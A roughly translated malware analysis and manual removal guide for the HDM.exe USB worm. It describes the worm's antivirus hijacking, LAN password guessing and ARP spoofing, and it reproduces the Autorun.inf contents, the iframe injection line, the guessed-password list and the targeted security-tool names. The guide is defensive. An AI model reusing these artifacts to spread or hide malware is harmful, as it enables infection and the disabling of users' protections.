HDM.exe manual killing U disk Virus method _ virus killing

HDM.exe is a vicious u disk virus, its destructive power, mainly in the following areas:


Quote:
1. Use recovery SSDT to destroy antivirus software
2.IFEO Image Hijacking
3. Close the specified window
4. Delete gho file
5. Destroy Safe mode, and Show hidden file function
6. Infection HTM and other Web files
7. Guess the password is spread through LAN
8. Through the U disk and other mobile storage transmission
9.arp Deception


The specific analysis is as follows:


Quote:
File:HDM.exe
size:13312 bytes
Modified:2007 year November 28, 16:52:08
Md5:7ec36fa2bcfc1ea72c26b74c928c78f6
sha1:b60048a8f9db67edf4b94bfe4da2a1906cd33b59
crc32:88d8970a


Technical details:

1. After the virus runs, release the following files and copies:


Quote:
C:\WINDOWS\system32\Winlogon.dll
C:\RESSDT.sys


Traverse all disk partitions to write HDM.exe and Autorun.inf at the root of the disk to achieve the purpose of transmission via USB disk and other mobile storage

Establish service RESSDT at the same time
Service Related Description:
Startup type: Manual
Image file path: C:\RESSDT.sys "
Display Name: "RESSDT"

This driver can then be loaded to disable the API hooks of some anti-virus software.

2. Release a getip.bat to the virus directory to obtain the IP address

3. Use the ping command to detect other machines within the same network segment and write the results to C:\EnumHost.txt

4. If you find other machines within the same network segment, copy the HDM.exe to the root of the c,d,e,f disk of the other machine by enumerating the username and password
The user name and password enumerated are as follows:

Quote:
Home
Movie
Alex
Love
Xp
123
Administrator
New
Guest
User
Game
Time
Yeah
Money
Xpuser

123456
Qwerty
abc123
Memory
12345678
88888
5201314
1314520
Asdfgh
Angel
Asdf
Baby
Woaini



It then uses the time to obtain the current machine and starts the virus with the at command at timed intervals

5. Get system catalog, download Http://*/arp.exe and Http://*/winpcap.exe
Under the system directory
Winpcap.exe is a sniffer.
Arp.exe has ARP spoofing function, can add http://www.*/wm.htm IFRAME code to 80 ports of other machines in LAN

6. Traverse the html,htm,asp,aspx,php,jsp file under all partitions of the disk
Add <iframe src=http://www.*/wm.htm width=0 height=0></iframe> code at its tail

7. Traverse all disk partitions delete gho files

8. Add Ifeo Project under SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File execution options\, hijack some anti-virus software

Quote:
360rpt.exe
360Safe.exe
360tray.exe
Adam.exe
AgentSvr.exe
AppSvc32.exe
Autoruns.exe
Avgrssvc.exe
AvMonitor.exe
Avp.com
Avp.exe
CCenter.exe
CcSvcHst.exe
FileDsty.exe
FrameworkServices.exe
FTCleanerShell.exe
HijackThis.exe
IceSword.exe
Iparmo.exe
Iparmor.exe
IsPwdSvc.exe
Kabaload.exe
Kascrscn.scr
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
Kmp.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
Krepair.com
KsLoader.exe
Kvcenter.kxp
KvDetect.exe
KvfwMcl.exe
Kvmonxp.kxp
Kvmonxp_1.kxp
Kvol.exe
Kvolself.exe
Kvreport.kxp
Kvscan.kxp
KVSrvXP.exe
Kvstub.kxp
Kvupload.exe
Kvwsc.exe
Kvxp.kxp
Kvxp_1.kxp
KWatch.exe
KWatch9x.exe
KWatchX.exe
Loaddll.exe
MagicSet.exe
Mcconsol.exe
Mcshield.exe
Mmqczj.exe
Mmsk.exe
MPMon.exe
MPSVC.exe
MPSVC1.exe
MPSVC2.exe
NaPrdMgr.exe
NAVSetup.exe
Nod32krn.exe
Nod32kui.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStub.exe
RavTask.exe
RegClean.exe
Regedit.exe
Rfwcfg.exe
RfwMain.exe
RfwProxy.exe
Rfwsrv.exe
RsAgent.exe
Rsaupd.exe
Runiep.exe
Safelive.exe
Scan32.exe
Shcfg32.exe
Shstat.exe
SmartUp.exe
SREng.exe
SWEEP95.exe
Symlcsvc.exe
SysSafe.exe
Tbmon.exe
TBSCAN.exe
TERegPct.exe
TrojanDetector.exe
Trojanwall.exe
Trojdie.kxp
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpdateUI.exe
UpLive.EXE.exe
VsTskMgr.exe
WEBSCANX.exe
WoptiClean.exe
ZONEALARM.exe
Zxsweep.exe
_avp32. Exe
_AVPCC. Exe
_AVPM. Exe


9. To Hklm\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\ Change the value of CheckedValue to 0x00000001 destroy show hidden file

10. Delete System\currentcontrolset\control\safeboot\network
and System\currentcontrolset\control\safeboot\minimal Keys
Break Safe Mode

11. Find the name of the specified window and close it

Quote:
Security guards
Scanning
Specially killed
Registration Form
Process
Process
Poison
Trojan
Defense
Firewall
Virus
Detection
Firewall
Virus
Anti
Jinshan
Jiangmin
Kaspersky
Worm
Antivirus


12. Start C:\Program files\internet Explorer\iexplore.exe Download Trojan
Download Http://www.*/1.exe~http://www.*/6.exe
To the Temp folder under the name Downfile.exe~downfile5.exe
One of the 1.exe is a trojan download, it can download a lot of Trojans, but the test has not been implanted successfully ...

13. Add registry entries under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run at the same time
<calc.exe><%SystemRoot%\system32\calc.exe> makes calc.exe boot but does not know what the specific role ...

14. Add a registry entry under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Nt\currentversion\winlogon\notify\winlogon
<WinlogonNotify:Winlogon><C:\WINDOWS\system32\Winlogon.dll> []

15. There is text in the virus body: "nofixups!" " Just test! "

All Trojan and virus implanted after the Sreng log is as follows:
Start Project


Quote:
Registration Form
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
<calc.exe><%SystemRoot%\system32\calc.exe> [(verified) Microsoft Windows Publisher]
<Cifmon><C:\WINDOWS\system32\Server.EXE> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Nt\currentversion\winlogon\notify\winlogon]
<WinlogonNotify:Winlogon><C:\WINDOWS\system32\Winlogon.dll> []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe]
<IFEO[360rpt.exe]><C:\HDM.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe]
<IFEO[360Safe.exe]><C:\HDM.exe> [] ...

==================================
Driver Program
[RAS asynchronous Media Driver/asyncmac] [Stopped/auto Start]
<system32\DRIVERS\comint32.sys><N/A>
[Ms/ms] [Stopped/manual Start]
<\?? \c:\docume~1\newcen~1\locals~1\temp\tmp13.tmp><n/a>
[RESSDT/RESSDT] [Stopped/manual Start]
<\?? \c:\ressdt.sys><n/a>
[Usbmouseb/usbmouseb] [Running/manual Start]
<\?? \c:\windows\system32\drivers\smbins.sys><n/a>
==================================
Running processes
[pid:1148] [C:\Program files\internet Explorer\iexplore.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-

2158)]
[C:\WINDOWS\system32\Insert.dll] [N/A,]
[pid:1428] [C:\WINDOWS\explorer.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\SYSTEM32\smbins.dll] [Microsoft Corporation, 5, 0, 2195, 3649]
==================================
Autorun.inf
[C:\]
[AutoRun]
Open=hdm.exe
Shellopen= Open (&o)
Shellopencommand=hdm.exe
Shellopendefault=1
Shellexplore= Resource Manager (&AMP;X)
Shell\explore\command=hdm.exe
[D:\]
[AutoRun]
Open=hdm.exe
Shellopen= Open (&o)
Shellopencommand=hdm.exe
Shellopendefault=1
Shellexplore= Resource Manager (&AMP;X)
Shell\explore\command=hdm.exe


Some Trojans are not implanted successfully, so they cannot be embodied

Workaround:

Download Sreng and Xdelbox

1. Extract Xdelbox all files to a folder
In the box next to the Add, enter each
%systemroot%\system32\drivers\comint32.sys
%systemroot%\system32\server.exe
%systemroot%\system32\winlogon.dll
C:\RESSDT.sys
%systemroot%\system32\drivers\smbins.sys
%systemroot%\system32\insert.dll
%systemroot%\system32\smbins.dll
After you enter one, the file that you added next to the Add button will appear in the big box below
Then select (Hold down ctrl) all the files in the large box below
Right-click Reboot Delete now

Uninstall Winpcap.exe Software

2. After restarting the computer
Open Sreng
Start the Project registry delete the following items
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
<calc.exe><%SystemRoot%\system32\calc.exe> [(verified) Microsoft Windows Publisher]
<Cifmon><C:\WINDOWS\system32\Server.EXE> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Nt\currentversion\winlogon\notify\winlogon]
<WinlogonNotify:Winlogon><C:\WINDOWS\system32\Winlogon.dll> []
Delete all red Ifeo items

"Hide Certified Microsoft Projects" in the "Startup Project"-"service"-"Driver" midpoint
Select the following items, click "Remove Service", click "Set", and click "No" in the pop-up box:

Quote:
[RAS asynchronous Media Driver/asyncmac] [Stopped/auto Start]
<system32\DRIVERS\comint32.sys><N/A>
[Ms/ms] [Stopped/manual Start]
<\?? \c:\docume~1\newcen~1\locals~1\temp\tmp13.tmp><n/a>
[RESSDT/RESSDT] [Stopped/manual Start]
<\?? \c:\ressdt.sys><n/a>
[Usbmouseb/usbmouseb] [Running/manual Start]
<\?? \c:\windows\system32\drivers\smbins.sys><n/a>


System repair-windows shell/ie Full Select click Repair
System Repair-Advanced repair-Repair security mode

Double click on my Computer, tools, Folder Options, view, click to select "Show hidden files or folders" and clear the "Hide protected operating system files (recommended)" Front of the hook. When you are prompted to determine the changes, click Yes and then determine
Click on the Folder button below the menu bar (search for the right button)
Click to open all disk partitions in the left resource manager
Delete the HDM.exe and Autorun.inf in their root directory, respectively

3. Repair of infected Web page files

Recommended use of Iframkill

So far, no anti-virus software has reported this virus

Because this is a relatively vicious virus, once the epidemic will be disastrous consequences, so I hope you do the following work to prevent similar virus appears
1. Play the whole system patch, timely upgrade anti-virus software and firewalls and turn on real-time monitoring function
2. Set a complex password for the system
3. Turn off automatic playback to prevent the intrusion of viruses similar to those transmitted via U disk